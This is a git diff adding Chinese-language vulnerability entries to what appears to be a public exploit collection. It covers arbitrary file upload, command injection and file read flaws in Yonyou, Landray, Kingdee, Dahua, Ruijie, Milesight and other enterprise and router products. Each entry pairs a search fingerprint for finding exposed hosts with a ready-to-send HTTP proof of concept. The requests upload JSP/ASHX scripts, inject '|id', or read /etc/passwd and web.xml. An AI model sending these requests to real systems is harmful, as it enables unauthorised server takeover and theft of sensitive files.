diff --git a/OA产品漏洞/images/image-20231116140545666.png b/OA产品漏洞/images/image-20231116140545666.png new file mode 100644 index 0000000..eb3b825 Binary files /dev/null and b/OA产品漏洞/images/image-20231116140545666.png differ diff --git a/OA产品漏洞/images/image-20231116140635693.png b/OA产品漏洞/images/image-20231116140635693.png new file mode 100644 index 0000000..33811f5 Binary files /dev/null and b/OA产品漏洞/images/image-20231116140635693.png differ diff --git a/OA产品漏洞/images/image-20231116141032395.png b/OA产品漏洞/images/image-20231116141032395.png new file mode 100644 index 0000000..ed92793 Binary files /dev/null and b/OA产品漏洞/images/image-20231116141032395.png differ diff --git a/OA产品漏洞/images/image-20231116141050903.png b/OA产品漏洞/images/image-20231116141050903.png new file mode 100644 index 0000000..c6b481f Binary files /dev/null and b/OA产品漏洞/images/image-20231116141050903.png differ diff --git a/OA产品漏洞/images/image-20231116141354722.png b/OA产品漏洞/images/image-20231116141354722.png new file mode 100644 index 0000000..ec97cab Binary files /dev/null and b/OA产品漏洞/images/image-20231116141354722.png differ diff --git a/OA产品漏洞/images/image-20231116141405041.png b/OA产品漏洞/images/image-20231116141405041.png new file mode 100644 index 0000000..01000e1 Binary files /dev/null and b/OA产品漏洞/images/image-20231116141405041.png differ diff --git a/OA产品漏洞/images/image-20231116141557650.png b/OA产品漏洞/images/image-20231116141557650.png new file mode 100644 index 0000000..0c62d6b Binary files /dev/null and b/OA产品漏洞/images/image-20231116141557650.png differ diff --git a/OA产品漏洞/images/image-20231116141617020.png b/OA产品漏洞/images/image-20231116141617020.png new file mode 100644 index 0000000..8eda221 Binary files /dev/null and b/OA产品漏洞/images/image-20231116141617020.png differ diff --git a/OA产品漏洞/用友 U8 cloud upload.jsp 任意文件上传漏洞.md b/OA产品漏洞/用友 U8 cloud upload.jsp 任意文件上传漏洞.md new file mode 100644 index 0000000..9bb92dc --- /dev/null +++ b/OA产品漏洞/用友 U8 cloud upload.jsp 任意文件上传漏洞.md @@ -0,0 +1,40 @@ +# 用友 U8 cloud upload.jsp 任意文件上传漏洞 + +## 漏洞描述 + +用友 U8 cloud upload.jsp 文件存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限 + +## 漏洞影响 + +用友 U8 cloud + +## 网络测绘 + +``` +"开启U8 cloud云端之旅" +``` + +## 漏洞复现 + +登陆页面 + +![image-20231116141405041](images/image-20231116141405041.png) + +poc + +``` +POST /linux/pages/upload.jsp HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +filename: Test.jsp +Accept-Encoding: gzip + +<% out.println("Test");%> +``` + +![image-20231116141354722](images/image-20231116141354722.png) + +``` +/linux/Test.jsp +``` + diff --git a/OA产品漏洞/蓝凌EIS 智慧协同平台 api.aspx 任意文件上传漏洞.md b/OA产品漏洞/蓝凌EIS 智慧协同平台 api.aspx 任意文件上传漏洞.md new file mode 100644 index 0000000..768a3ba --- /dev/null +++ b/OA产品漏洞/蓝凌EIS 智慧协同平台 api.aspx 任意文件上传漏洞.md @@ -0,0 +1,50 @@ +# 蓝凌EIS 智慧协同平台 api.aspx 任意文件上传漏洞 + +## 漏洞描述 + +蓝凌EIS 智慧协同平台 api.aspx 文件存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件 + +## 漏洞影响 + +蓝凌EIS 智慧协同平台 + +## 网络测绘 + +``` +icon_hash="953405444" +``` + +## 漏洞复现 + +登陆页面 + +![image-20231116141557650](images/image-20231116141557650.png) + +poc + +``` +POST /eis/service/api.aspx?action=saveImg HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 +Content-Length: 219 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynUqjgvhmkL1dxpCV +Upgrade-Insecure-Requests: 1 + +------WebKitFormBoundarynUqjgvhmkL1dxpCV +Content-Disposition: form-data; name="file"filename="test.asp" +Content-Type: text/html + +<% response.write("Test")%> +------WebKitFormBoundarynUqjgvhmkL1dxpCV-- +``` + +![image-20231116141617020](images/image-20231116141617020.png) + +``` +/files/editor_img/xxx/xxx.asp +``` + diff --git a/OA产品漏洞/金蝶OA EAS系统 uploadLogo.action 任意文件上传漏洞.md b/OA产品漏洞/金蝶OA EAS系统 uploadLogo.action 任意文件上传漏洞.md new file mode 100644 index 0000000..9a5cdf5 --- /dev/null +++ b/OA产品漏洞/金蝶OA EAS系统 uploadLogo.action 任意文件上传漏洞.md @@ -0,0 +1,60 @@ +# 金蝶OA EAS系统 uploadLogo.action 任意文件上传漏洞 + +## 漏洞描述 + +金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶 EAS 及 EAS Cloud 在 uploadLogo.action 存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件,从而可能导致服务器受到攻击并被控制。 + +## 漏洞影响 + +金蝶OA EAS系统 + +## 网络测绘 + +``` +"/easportal/" +``` + +## 漏洞复现 + +登陆页面 + +![image-20231116141032395](images/image-20231116141032395.png) + +poc + +``` +POST /plt_portal/setting/uploadLogo.action HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Accept-Encoding: gzip +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycxkT8bV6WLIUzm2p + +------WebKitFormBoundarycxkT8bV6WLIUzm2p +Content-Disposition: form-data; name="chooseLanguage_top" +ch + +------WebKitFormBoundarycxkT8bV6WLIUzm2p +Content-Disposition: form-data; name="dataCenter" + +xx +------WebKitFormBoundarycxkT8bV6WLIUzm2p +Content-Disposition: form-data; name="insId" + +------WebKitFormBoundarycxkT8bV6WLIUzm2p +Content-Disposition: form-data; name="type" + +top +------WebKitFormBoundarycxkT8bV6WLIUzm2p +Content-Disposition: form-data; name="upload"; filename="text.jsp" +Content-Type: image/jpeg + +Test +------WebKitFormBoundarycxkT8bV6WLIUzm2p-- +``` + +![image-20231116141050903](images/image-20231116141050903.png) + +``` +/portal/res/file/upload/xxx.jsp +``` + diff --git a/OA产品漏洞/金蝶OA 云星空 ScpSupRegHandler 任意文件上传漏洞.md b/OA产品漏洞/金蝶OA 云星空 ScpSupRegHandler 任意文件上传漏洞.md new file mode 100644 index 0000000..8e0f8fa --- /dev/null +++ b/OA产品漏洞/金蝶OA 云星空 ScpSupRegHandler 任意文件上传漏洞.md @@ -0,0 +1,68 @@ +# 金蝶OA 云星空 ScpSupRegHandler 任意文件上传漏洞 + +## 漏洞描述 + +金蝶OA 云星空 ScpSupRegHandler 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取服务器权限 + +## 漏洞影响 + +金蝶OA 云星空 + +## 网络测绘 + +``` +app="金蝶云星空-管理中心" +``` + +## 漏洞复现 + +登陆页面 + +![image-20231116140635693](images/image-20231116140635693.png) + +poc + +``` +POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1 +Host: +Accept-Encoding: identity +Content-Length: 973 +Accept-Language: zh-CN,zh;q=0.8 +Accept: */* +Cache-Control: max-age=0 +Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061 + +--2ac719f8e29343df94aa4ab49e456061 +Content-Disposition: form-data; name="dbId_v" + +. +--2ac719f8e29343df94aa4ab49e456061 +Content-Disposition: form-data; name="FID" + +2022 +--2ac719f8e29343df94aa4ab49e456061 +Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/test.ashx." +Content-Type: text/plain + +<%@ WebHandler Language="C#" Class="TestHandler" %> + using System; + using System.Web; + public class TestHandler : IHttpHandler { + public void + ProcessRequest (HttpContext context) { + context.Response.ContentType= "text/plain"; + context.Response.Write("Test"); + } + public bool IsReusable { + get {return false; } + } + } +--2ac719f8e29343df94aa4ab49e456061-- +``` + +![image-20231116140545666](images/image-20231116140545666.png) + +``` +/K3Cloud/uploadfiles/Test.ashx +``` + diff --git a/README.md b/README.md index 0a6a045..a18acf1 100644 --- a/README.md +++ b/README.md @@ -148,6 +148,7 @@ * 用友 NC NCFindWeb 任意文件读取漏洞 * 用友 NC XbrlPersistenceServlet反序列化 * 用友 NCCloud FS文件管理SQL注入 + * 用友 U8 cloud upload.jsp 任意文件上传漏洞 * 用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞 * 用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞 * 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞 @@ -170,6 +171,7 @@ * 致远OA webmail.do 任意文件下载 CNVD-2020-62422 * 致远OA wpsAssistServlet 任意文件上传漏洞 * 致远OA 帆软组件 ReportServer 目录遍历漏洞 + * 蓝凌EIS 智慧协同平台 api.aspx 任意文件上传漏洞 * 蓝凌OA admin.do JNDI远程命令执行 * 蓝凌OA custom.jsp 任意文件读取漏洞 * 蓝凌OA kmImeetingRes.do 后台SQL注入漏洞 CNVD-2021-01363 @@ -197,8 +199,10 @@ * 金和OA C6 download.jsp 任意文件读取漏洞 * 金和OA C6 OpenFile.aspx 后台越权敏感文件遍历漏洞 * 金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞 + * 金蝶OA EAS系统 uploadLogo.action 任意文件上传漏洞 * 金蝶OA server_file 目录遍历漏洞 * 金蝶OA 云星空 CommonFileServer 任意文件读取漏洞 + * 金蝶OA 云星空 ScpSupRegHandler 任意文件上传漏洞 - Web应用漏洞 * 1039家校通 万能密码绕过 CNVD-2020-31494 @@ -712,6 +716,7 @@ * Kyan 网络监控设备 run.php 远程命令执行漏洞 * Kyan 网络监控设备 time.php 远程命令执行漏洞 * MagicFlow 防火墙网关 main.xp 任意文件读取漏洞 + * Milesight Router httpd.log 信息泄漏漏洞 CVE-2023-4714 * Milesight VPN server.js 任意文件读取漏洞 * MSA 互联网管理网关 msa 任意文件下载漏洞 * NetMizer 日志管理系统 cmd.php 远程命令执行漏洞 @@ -759,6 +764,7 @@ * 启明星辰 4A统一安全管控平台 getMaster.do 信息泄漏漏洞 * 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 * 启明星辰 天清汉马USG防火墙 默认口令漏洞 + * 大华 ICC智能物联综合管理平台 readPic 任意文件读取漏洞 * 大华 城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞 * 大华 智慧园区综合管理平台 getFaceCapture SQL注入漏洞 * 大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 账号密码泄漏漏洞 @@ -776,6 +782,7 @@ * 宏电 H8922 后台管理员信息泄露漏洞 CVE-2021-28151 * 小米 路由器 c_upload 远程命令执行漏洞 CVE-2019-18370 * 小米 路由器 extdisks 任意文件读取漏洞 CVE-2019-18371 + * 思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞 * 悦泰节能 智能数据网关 resources 任意文件读取漏洞 * 惠尔顿 e地通 config.xml 信息泄漏漏洞 * 才茂通信 网关 formping 远程命令执行漏洞 @@ -785,6 +792,7 @@ * 电信 中兴ZXHN F450A网关 默认管理员账号密码漏洞 * 电信 天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞 * 电信 网关配置管理系统 login.php SQL注入漏洞 + * 百为通达 智能流控路由器 open 远程命令执行漏洞 * 百卓 Patflow showuser.php 后台SQL注入漏洞 * 百卓 Smart importhtml.php 远程命令执行漏洞 * 皓峰防火墙 setdomain.php 越权访问漏洞 @@ -821,6 +829,7 @@ * 锐捷 Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369 * 锐捷 SSL VPN 越权访问漏洞 * 锐捷 云课堂主机 pool 目录遍历漏洞 + * 锐捷 校园网自助服务系统 login_judge.jsf 任意文件读取漏洞 * 飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞 * 飞鱼星 家用智能路由 cookie.cgi 权限绕过 ## 0x02 声明 diff --git a/其他漏洞/Ueditor编辑器漏洞总结.md b/其他漏洞/Ueditor编辑器漏洞总结.md index 831d90e..0521326 100644 --- a/其他漏洞/Ueditor编辑器漏洞总结.md +++ b/其他漏洞/Ueditor编辑器漏洞总结.md @@ -15,7 +15,7 @@ UEditor 是由百度「FEX前端研发团队」开发的所见即所得富文本 file 目录文件读取: ``` -http://www.xxxx.comhttps://14.23.155.17 /net/controller.ashx?action=listfile +http://www.xxxx.com/net/controller.ashx?action=listfile ``` image 目录文件读取: diff --git a/网络设备漏洞/Milesight Router httpd.log 信息泄漏漏洞 CVE-2023-4714.md b/网络设备漏洞/Milesight Router httpd.log 信息泄漏漏洞 CVE-2023-4714.md new file mode 100644 index 0000000..eb1b1f1 --- /dev/null +++ b/网络设备漏洞/Milesight Router httpd.log 信息泄漏漏洞 CVE-2023-4714.md @@ -0,0 +1,29 @@ +# Milesight Router httpd.log 信息泄漏漏洞 CVE-2023-4714 + +## 漏洞描述 + +Milesight Router 存在信息泄漏漏洞,攻击者通过访问httpd.log可以获取登陆敏感日志信息 + +## 漏洞影响 + +Milesight Router + +## 网络测绘 + +``` +"rt_title" +``` + +## 漏洞复现 + +登陆页面 + +![image-20231116142232135](images/image-20231116142232135.png) + +poc + +``` +/lang/log/httpd.log +``` + +![image-20231116142246862](images/image-20231116142246862.png) \ No newline at end of file diff --git a/网络设备漏洞/images/image-20231116141833821.png b/网络设备漏洞/images/image-20231116141833821.png new file mode 100644 index 0000000..475f1e5 Binary files /dev/null and b/网络设备漏洞/images/image-20231116141833821.png differ diff --git a/网络设备漏洞/images/image-20231116141852063.png b/网络设备漏洞/images/image-20231116141852063.png new file mode 100644 index 0000000..2d44f6b Binary files /dev/null and b/网络设备漏洞/images/image-20231116141852063.png differ diff --git a/网络设备漏洞/images/image-20231116142008257.png b/网络设备漏洞/images/image-20231116142008257.png new file mode 100644 index 0000000..b7eae0c Binary files /dev/null and b/网络设备漏洞/images/image-20231116142008257.png differ diff --git a/网络设备漏洞/images/image-20231116142021268.png b/网络设备漏洞/images/image-20231116142021268.png new file mode 100644 index 0000000..898dbcb Binary files /dev/null and b/网络设备漏洞/images/image-20231116142021268.png differ diff --git a/网络设备漏洞/images/image-20231116142127906.png b/网络设备漏洞/images/image-20231116142127906.png new file mode 100644 index 0000000..f2393a7 Binary files /dev/null and b/网络设备漏洞/images/image-20231116142127906.png differ diff --git a/网络设备漏洞/images/image-20231116142143817.png b/网络设备漏洞/images/image-20231116142143817.png new file mode 100644 index 0000000..ebda04f Binary files /dev/null and b/网络设备漏洞/images/image-20231116142143817.png differ diff --git a/网络设备漏洞/images/image-20231116142232135.png b/网络设备漏洞/images/image-20231116142232135.png new file mode 100644 index 0000000..9b57d20 Binary files /dev/null and b/网络设备漏洞/images/image-20231116142232135.png differ diff --git a/网络设备漏洞/images/image-20231116142246862.png b/网络设备漏洞/images/image-20231116142246862.png new file mode 100644 index 0000000..98ebda3 Binary files /dev/null and b/网络设备漏洞/images/image-20231116142246862.png differ diff --git a/网络设备漏洞/images/image-20231116142459917.png b/网络设备漏洞/images/image-20231116142459917.png new file mode 100644 index 0000000..c6ee307 Binary files /dev/null and b/网络设备漏洞/images/image-20231116142459917.png differ diff --git a/网络设备漏洞/images/image-20231116142521368.png b/网络设备漏洞/images/image-20231116142521368.png new file mode 100644 index 0000000..b977b47 Binary files /dev/null and b/网络设备漏洞/images/image-20231116142521368.png differ diff --git a/网络设备漏洞/大华 ICC智能物联综合管理平台 readPic 任意文件读取漏洞.md b/网络设备漏洞/大华 ICC智能物联综合管理平台 readPic 任意文件读取漏洞.md new file mode 100644 index 0000000..27d05ed --- /dev/null +++ b/网络设备漏洞/大华 ICC智能物联综合管理平台 readPic 任意文件读取漏洞.md @@ -0,0 +1,29 @@ +# 大华 ICC智能物联综合管理平台 readPic 任意文件读取漏洞 + +## 漏洞描述 + +大化 ICC智能物联综合管理平台 readPic 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感文件 + +## 漏洞影响 + +大华 ICC智能物联综合管理平台 + +## 网络测绘 + +``` +body="*客户端会小于800*" +``` + +## 漏洞复现 + +登陆页面 + +![image-20231116141833821](images/image-20231116141833821.png) + +poc + +``` +/evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd +``` + +![image-20231116141852063](images/image-20231116141852063.png) \ No newline at end of file diff --git a/网络设备漏洞/思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞.md b/网络设备漏洞/思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞.md new file mode 100644 index 0000000..a121954 --- /dev/null +++ b/网络设备漏洞/思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞.md @@ -0,0 +1,38 @@ +# 思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞 + +## 漏洞描述 + +思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统 test_qrcode_b 路由存在命令执行漏洞。 + +## 漏洞影响 + +思福迪 运维安全管理系统 + +## 网络测绘 + +``` +app="思福迪-LOGBASE" +``` + +## 漏洞复现 + +登陆页面 + +![image-20231116142127906](images/image-20231116142127906.png) + +poc + +``` +POST /bhost/test_qrcode_b HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 +Content-Length: 23 +Connection: close +Content-Type: application/x-www-form-urlencoded +Referer: http://xxx.xxx.xxx.xxx +Accept-Encoding: gzip + +z1=1&z2="|id;"&z3=bhost +``` + +![image-20231116142143817](images/image-20231116142143817.png) \ No newline at end of file diff --git a/网络设备漏洞/百为通达 智能流控路由器 open 远程命令执行漏洞.md b/网络设备漏洞/百为通达 智能流控路由器 open 远程命令执行漏洞.md new file mode 100644 index 0000000..8c43783 --- /dev/null +++ b/网络设备漏洞/百为通达 智能流控路由器 open 远程命令执行漏洞.md @@ -0,0 +1,30 @@ +# 百为通达 智能流控路由器 open 远程命令执行漏洞 + +## 漏洞描述 + +BYTEVALUE 百为流控路由器是一款追求带宽利用率的多功能路由器。百为智能流控路由器 /goform/webRead/open 路由存在有回显的命令注入漏洞。 + +## 漏洞影响 + +百为通达 智能流控路由器 + +## 网络测绘 + +``` +"BYTEVALUE 智能流控路由器" +``` + +## 漏洞复现 + +登陆页面 + +![image-20231116142008257](images/image-20231116142008257.png) + +poc + +``` +GET /goform/webRead/open/?path=|id HTTP/1.1 +Host: +``` + +![image-20231116142021268](images/image-20231116142021268.png) \ No newline at end of file diff --git a/网络设备漏洞/锐捷 校园网自助服务系统 login_judge.jsf 任意文件读取漏洞.md b/网络设备漏洞/锐捷 校园网自助服务系统 login_judge.jsf 任意文件读取漏洞.md new file mode 100644 index 0000000..d00f86f --- /dev/null +++ b/网络设备漏洞/锐捷 校园网自助服务系统 login_judge.jsf 任意文件读取漏洞.md @@ -0,0 +1,29 @@ +# 锐捷 校园网自助服务系统 login_judge.jsf 任意文件读取漏洞 + +## 漏洞描述 + +锐捷 校园网自助服务系统 login_judge.jsf 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感文件 + +## 漏洞影响 + +锐捷 校园网自助服务系统 + +## 网络测绘 + +``` +body="校园网自助服务系统" +``` + +## 漏洞复现 + +登陆页面 + +![image-20231116142459917](images/image-20231116142459917.png) + +poc + +``` +/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F +``` + +![image-20231116142521368](images/image-20231116142521368.png) \ No newline at end of file